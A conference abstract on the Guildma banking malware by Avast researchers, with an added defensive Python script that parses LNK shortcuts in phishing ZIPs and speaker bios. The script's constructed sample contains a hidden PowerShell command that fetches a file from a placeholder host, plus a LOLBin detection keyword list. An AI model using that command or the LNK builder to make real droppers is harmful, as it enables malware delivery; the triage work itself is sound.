Guildma: timers sent from hell

Adolf Středa, Luigino Camastra/AVAST

For several months now, we have been tracking a malware campaign called Guildma. Guildma is a powerful combination of a RAT (remote access tool), spyware, password stealer and banker malware, distributed mainly via malicious attachments in phishing emails.

The cybercriminals behind Guildma have primarily focused on targeting Brazilian users and services, but since May 2019 they have expanded their range and are now targeting more than 130 banks and 75 other web services around the world.

The infection is spread by emails posing as invoices, tax reports, invitations and similar documents, each carrying an attachment: a ZIP archive containing a malicious LNK file. The LNK file fetches the first loader, which in turn retrieves all the remaining modules. After several layers of loaders, a core module is launched. The core module fingerprints the system and monitors launched applications; when a targeted application is started, basic information is extracted from it and further modules are either loaded or injected. Two of these modules are Nirsoft’s password recovery tools, and two more provide RAT, keylogging and data exfiltration functionality. Interestingly, the remaining modules facilitate mass-mailing, form-grabbing and crawling of email-client data.
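The ZIP-plus-LNK delivery described above is the stage a mail gateway or analyst sees first, so a useful triage step is to open the archive, find any .lnk entry and recover the command line it would run. The script below is an added example written for this page, not Avast's tooling: it parses the Shell Link header and StringData (relative path, working directory, arguments) as laid out in MS-SHLLINK and flags command lines that invoke LOLBins or embed a URL. The sample attachment, its filenames and the command line are constructed placeholders, not real Guildma indicators, and the LNK builder assumes a minimal link with no LinkTargetIDList or LinkInfo block.

```python
"""Triage a phishing ZIP for LNK droppers by parsing Shell Link StringData."""
import io
import struct
import uuid
import zipfile

# LinkFlags bits from MS-SHLLINK section 2.1.1 (ShellLinkHeader)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046")
HEADER_SIZE = 0x4C  # fixed 76-byte ShellLinkHeader

# StringData fields in the order the specification stores them
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Keywords that make a shortcut command line worth a closer look
SUSPICIOUS = ("cmd", "powershell", "wscript", "cscript", "mshta",
              "rundll32", "regsvr32", "bitsadmin", "certutil", "http")


def build_lnk(relative_path, arguments, working_dir=""):
    """Construct a minimal .lnk: header plus StringData only (assumption: no IDList/LinkInfo)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    if working_dir:
        flags |= HAS_WORKING_DIR
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID.bytes_le + struct.pack("<I", flags)
    # Remaining header fields (attributes, timestamps, size, icon index, ShowCommand, hotkey, reserved) zeroed
    header += b"\x00" * (HEADER_SIZE - len(header))

    def string_data(s):  # CountCharacters (UTF-16 code units) followed by the characters
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = string_data(relative_path)
    if working_dir:
        body += string_data(working_dir)
    body += string_data(arguments)
    return header + body


def parse_lnk(data):
    """Return the StringData fields of a Shell Link as a dict; raise ValueError if it is not one."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short for a ShellLinkHeader")
    size, = struct.unpack_from("<I", data, 0)
    if size != HEADER_SIZE or uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("not a Shell Link (bad HeaderSize or LinkCLSID)")
    flags, = struct.unpack_from("<I", data, 20)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # skip IDListSize + IDList
        idlist_size, = struct.unpack_from("<H", data, pos)
        pos += 2 + idlist_size
    if flags & HAS_LINK_INFO:                # skip LinkInfo (its first DWORD is its total size)
        info_size, = struct.unpack_from("<I", data, pos)
        pos += info_size
    fields = {}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


def triage_zip(zip_bytes):
    """List every .lnk inside a ZIP with its reconstructed command line and matched keywords."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                fields = parse_lnk(zf.read(info))
            except ValueError as exc:
                findings.append({"entry": info.filename, "error": str(exc)})
                continue
            cmdline = " ".join(v for v in (fields.get("relative_path"), fields.get("arguments")) if v)
            hits = [kw for kw in SUSPICIOUS if kw in cmdline.lower()]
            findings.append({"entry": info.filename, "cmdline": cmdline, "suspicious": hits})
    return findings


def sample_attachment():
    """Constructed sample: a decoy text file plus a double-extension LNK (placeholder URL, not a real IoC)."""
    lnk = build_lnk(
        relative_path=r"..\..\..\Windows\System32\cmd.exe",
        arguments=r'/c powershell -w hidden -c "iwr http://stage1.invalid/l -OutFile %TEMP%\l.bat"',
        working_dir=r"%TEMP%",
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Nota_Fiscal.txt", "decoy")
        zf.writestr("Nota_Fiscal.pdf.lnk", lnk)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(sample_attachment()):
        print(finding)
```

Real-world shortcuts almost always carry a LinkTargetIDList and often an ExtraData block after the StringData, so the parser skips the former by its declared size and simply stops after the last string; anything after that is ignored. The keyword list is deliberately crude and is only meant to surface entries for manual review.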

All the binary modules are written in Delphi and rely heavily on timers. These timers are often highly interdependent and use other controls, such as labels or buttons, to pass information between themselves instead of ordinary variables. Some of the modules also create files that are used to pass data between modules or to signal that a targeted application has been found.

In our analysis, we present the infection process and a detailed description of Guildma’s modules. As the structure of the modules and their relations is very complex, we aim to provide a high-level overview augmented by interesting technical details. Because this research covers an extended period, we can also describe the evolution of Guildma over time.

November 7 at 15:00 - 15:30, Stage B

Adolf Středa is a Reverse Engineer at Avast. He specializes in botnets, more specifically botnet communication analysis and information extraction. He is also a PhD student at the Faculty of Mathematics and Physics of Charles University in Prague, Czech Republic, specializing in cryptography. So far, he has presented his research at SantaCrypt, AVAR, Botconf, and Virus Bulletin.

Luigino Camastra is a Malware Researcher at Avast. His main specialization is reverse engineering of PE files, identifying malware families, and writing detection rules. He is mainly interested in researching new malware families. Currently, he is a master’s degree student at the Faculty of Information Technology of the Czech Technical University, specializing in IT security. So far, he has presented his research at APWG.